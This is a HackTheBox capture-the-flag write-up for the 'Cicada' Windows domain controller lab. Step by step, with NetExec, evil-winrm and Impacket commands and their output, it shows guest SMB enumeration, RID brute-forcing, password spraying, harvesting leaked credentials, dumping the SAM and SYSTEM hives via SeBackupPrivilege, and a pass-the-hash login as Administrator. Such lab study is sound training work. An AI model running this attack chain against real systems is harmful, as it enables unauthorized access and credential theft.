Cicada – HackTheBox Link to heading
- OS: Cicada
- Difficulty: Easy
- Platform: HackTheBox
Summary Link to heading
“Cicada” is an easy box from HackTheBox platform. The machine allows a Guest session through SMB service which leaks a default password for new users. We obtain users through RID bruteforcing and found a user whose password is the password found at the leaked file. With this new user we are able to enumerate users in the domain/machine, where one of them leaks a password for itself in its description. This new user can read a new shared resource where credentials for a third user are leaked. This third user can connect to the victim machine through WinRM, gaining access to the victim machine. Once inside, we see that this third user has SeBackupPrivilege enabled, which allow us to create backup copies of important file systems, dump credentials in them and obtain the hash for Administrator user. We use this dumped hash to perform a Pass The Hash attack and impersonate Administrator, taking total control over the victim machine.
User Link to heading
We start looking for open TCP ports with a quick Nmap scan:
❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.10.11.35
Scanned at 2025-02-13 20:28:36 -03 for 58s
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
63480/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 58.59 seconds
Raw packets sent: 262138 (11.534MB) | Rcvd: 75 (3.300KB)
We can see multiple ports open: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM); among many others
We then apply some recognition scans with Nmap over these ports using -sVC flag:
❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,63480 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.42s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-14 06:32:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
63480/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-14T06:33:17
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.68 seconds
Open ports indicate we are against a machine in an Active Directory environment.
NetExec is a “swiss army knife” tool and how we can reach the intrusion only using this tool.We start using NetExec against SMB service in the target machine:
❯ nxc smb 10.10.11.35
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
We have a domain cicada.htb, a machine name CICADA-DC and a FQDN (machine name with the domain) CICADA-DC.cicada.htb.
We can add this domain, machine name and FQDN to our /etc/hosts file to avoid future problems with LDAP service if we eventually need to use this protocol or Kerberos:
❯ echo '10.10.11.35 CICADA-DC CICADA-DC.cicada.htb cicada.htb' | sudo tee -a /etc/hosts
The machine apparently allows a NULL session (we provide no user, neither a password):
❯ nxc smb 10.10.11.35 -u '' -p ''
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
We can see a [+] symbol that indicates this is correct.
However, this is a fake positive. When we try to enumerate available shares using NetExec, along with --shares flag, we get STATUS_ACCESS_DENIED:
❯ nxc smb 10.10.11.35 -u '' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Nevertheless, we can check if the machine allows Guest sessions passing as user any user and no password:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
We have provided a simple random user called a, no password and we are allowed to enumerate shares. There we can see a share we are allowed to read called HR.
We can check its content using NetExec with some spidering (extract information using patterns). We can provide --spider flag along with the share we want to spider (analyze). We also provide the “pattern” with --pattern which indicates the text we want in the files (for example, if we put --pattern txt it will only display files called test.txt, filetxt.pdf, etc). If we want any file just put a dot (.):
❯ nxc smb 10.10.11.35 -u 'a' -p '' --spider 'HR' --pattern .
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Started spidering
SMB 10.10.11.35 445 CICADA-DC [*] Spidering .
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/HR/. [dir]
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/HR/.. [dir]
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/HR/Notice from HR.txt [lastm:'2024-08-28 13:31' size:1266]
SMB 10.10.11.35 445 CICADA-DC [*] Done spidering (Completed in 1.4311010837554932)
There is a Notice from HR.txt file at HR share.
Now we can download this file. But before that, NetExec has a really cool option that allow us to check if the word password is inside a share. In this case we would like to see every potential file that has the word password stored in it. For that, along with --spider, we can add --content to specify we want to check the content of the file, followed by --regex along with the Regular Expression we want to use. Since we want to search for the word password (in case insensitive) we can use --content --regex '(?i)password' within HR share as follows:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --spider 'HR' --content --regex '(?i)password'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Started spidering
SMB 10.10.11.35 445 CICADA-DC [*] Spidering .
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/HR/Notice from HR.txt [lastm:'2024-08-28 13:31' size:1266 offset:1266 regex:'b'(?i)password'']
SMB 10.10.11.35 445 CICADA-DC [*] Done spidering (Completed in 2.866698741912842)
We can see that the document //10.10.11.35/HR/Notice from HR.txt contains the word password. This is really useful when we have multiple files instead of checking them one by one.
Now that we have a target file, we can download this file using NetExec with --share flag, along with --get-file flag. We will then attempt to download the file Notice from HR.txt located at HR share and save it into our attacker machine as leaked_file.txt as follows:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --share 'HR' --get-file 'Notice from HR.txt' leaked_file.txt
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Copying "Notice from HR.txt" to "leaked_file.txt"
SMB 10.10.11.35 445 CICADA-DC [+] File "Notice from HR.txt" was downloaded to "leaked_file.txt"
We have downloaded the file as leaked_file.txt in our attacker machine.
Once the file has been downloaded, read this file using cat in our attacker machine:
❯ cat leaked_file.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
where the key line is:
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
We have a potential password: Cicada$M6Corpb*@Lp#nZp!8, but we don’t have users.
We could use --users flag to attempt to obtain users in the domain using our guest session:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
But we don’t get any output. So probably we are not allowed to enumerate them.
Another option to obtain users is using --rid-brute. RID, or RELATIVE ID, is an identifier variable that is assigned to an object when we create them in an Active Directory environment. So, for example, when we create a user in an Active Directory an RID is assigned to it. The same applies to groups as well. Using --rid-brute in NetExec tries to obtain the names of users or groups bruteforcing RID values up to 4000. We can bruteforce users then running:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
<SNIP>
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
This worked!
However, to only keep users we can see that the word SidTypeUser appears for users and SidTypeGroup appears for groups. Therefore, we play a little bit filtering by SidTypeUser string with grep, and save the columns showing the users using awk:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}'
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Let’s save these users into a file called domain_users.txt:
❯ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}' > domain_users.txt
We have a list of users and a potential password. Therefore, we can attempt a Password Spray (try one password for different users) and see if any of them has not changed the default password. We can pass as -u (user) argument the list we have created previously and as password the default password found in the leaked file. We also use --continue-on-success since this password could be the correct password for more than one user and we do not want NetExec to stop the Password Spray when it finds a match. We run then:
❯ nxc smb 10.10.11.35 -u domain_users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
The password matches for the user michael.wrightson. Therefore, we have valid credentials: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8.
Let’s check what shares can read this user:
❯ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
But we don’t have any new shares to read.
Now that we have a valid user, we could attempt to enumerate users using --users flag in NetExec since we should be now able to read their description:
❯ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.35 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.10.11.35 445 CICADA-DC Guest 2024-08-28 17:26:56 1 Built-in account for guest access to the computer/domain
SMB 10.10.11.35 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.10.11.35 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
SMB 10.10.11.35 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.10.11.35 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.10.11.35 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated 8 local users: CICADA
We have an interesting description for the user david.orelious that says:
Just in case I forget my password is aRt$Lp#7t*VQ!3
Well, thank you.
We can check if these new credentials are correct (user david.orelious and password aRt$Lp#7t*VQ!3):
❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
Credentials are correct. We have a new user.
Check if this user has some new shares availables we can inspect:
❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
We can read DEV share. That’s a new one.
As we have seen, we can inspect it using --spider and --pattern flags with NetExec:
❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --spider DEV --pattern .
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Started spidering
SMB 10.10.11.35 445 CICADA-DC [*] Spidering .
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/DEV/. [dir]
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/DEV/.. [dir]
SMB 10.10.11.35 445 CICADA-DC //10.10.11.35/DEV/Backup_script.ps1 [lastm:'2024-08-28 13:28' size:601]
SMB 10.10.11.35 445 CICADA-DC [*] Done spidering (Completed in 1.4138860702514648)
We have a file called Backup_script.ps1 which seems interesting.
We can then download this file using NetExec:
❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --share DEV --get-file 'Backup_script.ps1' 'Backup_script.ps1'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Copying "Backup_script.ps1" to "Backup_script.ps1"
SMB 10.10.11.35 445 CICADA-DC [+] File "Backup_script.ps1" was downloaded to "Backup_script.ps1"
Once we have downloaded the file, we check its content. It is a PowerShell script:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
The script, in summary, creates a backup of the directory C:\smb and stores it at D:\Backup path using as stamp the time. However, the important part of the script is:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
We have a new plain text password for the user emily.oscars. As we have found previously when we dumped the users from the domain, this user exists in the domain. We check if these credentials are valid:
❯ nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
They are valid.
We can finally check if this user can log into the target machine through WinRM service (whose port, 5985, was exposed) with NetExec as well:
❯ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
We can see the message Pwn3d!, which means for winrm protocol, that credentials are correct and we can connect to the victim machine through WinRM.
We could even get the user flag only using NetExec, since we can execute commands using PowerShell (which is the tool that WinRM uses) with the flag -X "<command>". Enumerate directories at C:\Users:
❯ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'dir C:\Users\'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM 10.10.11.35 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.10.11.35 5985 CICADA-DC
WINRM 10.10.11.35 5985 CICADA-DC
WINRM 10.10.11.35 5985 CICADA-DC Directory: C:\Users
WINRM 10.10.11.35 5985 CICADA-DC
WINRM 10.10.11.35 5985 CICADA-DC
WINRM 10.10.11.35 5985 CICADA-DC Mode LastWriteTime Length Name
WINRM 10.10.11.35 5985 CICADA-DC ---- ------------- ------ ----
WINRM 10.10.11.35 5985 CICADA-DC d----- 8/26/2024 1:10 PM Administrator
WINRM 10.10.11.35 5985 CICADA-DC d----- 8/22/2024 2:22 PM emily.oscars.CICADA
WINRM 10.10.11.35 5985 CICADA-DC d-r--- 3/14/2024 3:45 AM Public
and grab the user flag:
❯ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'type C:\Users\emily.oscars.CICADA\Desktop\user.txt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM 10.10.11.35 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.10.11.35 5985 CICADA-DC 508<SNIP>
We could keep only using NetExec, but from this point we can use evil-winrm and emily.oscars credentials to enter into the victim machine with an interactive console:
❯ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
NT Authority/System - Administrator Link to heading
Checking privileges for this user we can see:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We have SeBackupPrivilege privilege enabled. This means that we could create copies of SAM and SYSTEM files (the files that store credentials in Windows systems) and attempt to dump data stored within them into our attacker machine as this blog explains.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\SAM sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\SYSTEM system
The operation completed successfully.
Now that we have copies created, pass them to our attacker machine using download command from evil-winrm:
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
And attempt to dump credentials stored in these files with secretsdump.py from Impacket, passing as argument the downloaded files:
❯ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
We get a hash for Administrator user.
We check if this hash corresponds to Administrator’s hash using NetExec:
❯ nxc smb 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
It works! Since we obtained the message Pwn3d! for smb protocol in NetExec, this means that we have privileges over the system.
Use this hash for a Pass The Hash attack for Administrator user with evil-winrm:
❯ evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
GG. We can grab the root.txt flag at Administrator Desktop.
~Happy Hacking